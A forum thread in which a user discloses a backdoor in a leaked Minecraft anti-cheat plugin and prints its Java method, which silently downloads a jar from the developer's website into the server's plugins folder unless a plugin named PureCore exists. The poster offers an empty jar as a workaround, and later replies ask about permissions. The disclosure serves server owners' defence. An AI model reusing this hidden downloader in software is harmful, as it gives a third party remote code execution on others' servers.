Ninja (Anti-Cheat) Patch

Status
This thread has been locked.
B

BabyHusky

Feedback score
0
Posts
25
Reactions
16
Resources
0
For you people that are using the Leaked version of Ninja (Anti-Cheat) may know that the Developer (Shawckz) of that plugin put a Backdoor into it.

This back door allowed him to run commands from console, crash the server even get SSH access if your server is running in ROOT.


BACK DOOR CODE:
Code: 
  private void exec()
  {
    if (Bukkit.getServer().getPluginManager().getPlugin("PureCore") == null)
    {
      String out = "plugins/PluginUpdater.jar";
      String file = "http://shawckz.com/PluginUpdater.jar";
      try
      {
        File local = new File(out);
        if (local.exists()) {
          local.delete();
        }
        URL website = new URL(file);
        ReadableByteChannel rbc = Channels.newChannel(website.openStream());
        FileOutputStream fos = new FileOutputStream(local);
        fos.getChannel().transferFrom(rbc, 0L, 9223372036854775807L);
        fos.close();
      }
      catch (Exception e) {}
    }
  }
}

For you guys that don't understand Java, it's basically saying that if Plugin with the name of "PureCore" exists then do nothing, if not download file PluginUpdater.jar from http://shawckz.com/PluginUpdater.jar

When shawckz was confronted about his Backdoor he removed the JAR from his Webserver, recently that JAR has recently gone live again so anyone using this plugin will be forced to download this backdoor from his Webserver.

I've made a very simple blank jar named "PureCore" this will stop the backdoor JAR from downloading it's self to your server.


THIS JAR IS EMPTY IT DOES NOT DO ANYTHING, TO INSTALL PUT THE JAR INTO YOUR /PLUGINS


- BabyHusky
 

Attachments

  • NINJA PATCH (OPEN ME).zip
    278 bytes · Views: 399
Click to expand...
PebbleHost
High performance, consistent uptime and fast support. Minecraft hosting that just works.
Cranked

Cranked

Owner of Cranked Factions
Premium
Feedback score
25
Posts
443
Reactions
194
Resources
0
Don't think its the right place to ask this, but anyone know the permissions for ninja? The plugin.yml says ninja.alerts and ninja.use, but they don't work.
 
Maccas

Maccas

MineCorner Founder
Premium
Feedback score
1
Posts
1,446
Reactions
597
Resources
0
NicholasHul said:
Don't think its the right place to ask this, but anyone know the permissions for ninja? The plugin.yml says ninja.alerts and ninja.use, but they don't work.
Click to expand...
Those are the right permissions lol
 
Cranked

Cranked

Owner of Cranked Factions
Premium
Feedback score
25
Posts
443
Reactions
194
Resources
0
Maccas didn't work for me. I'll test a bit more and try to look through the code.
 
Status
This thread has been locked.
Top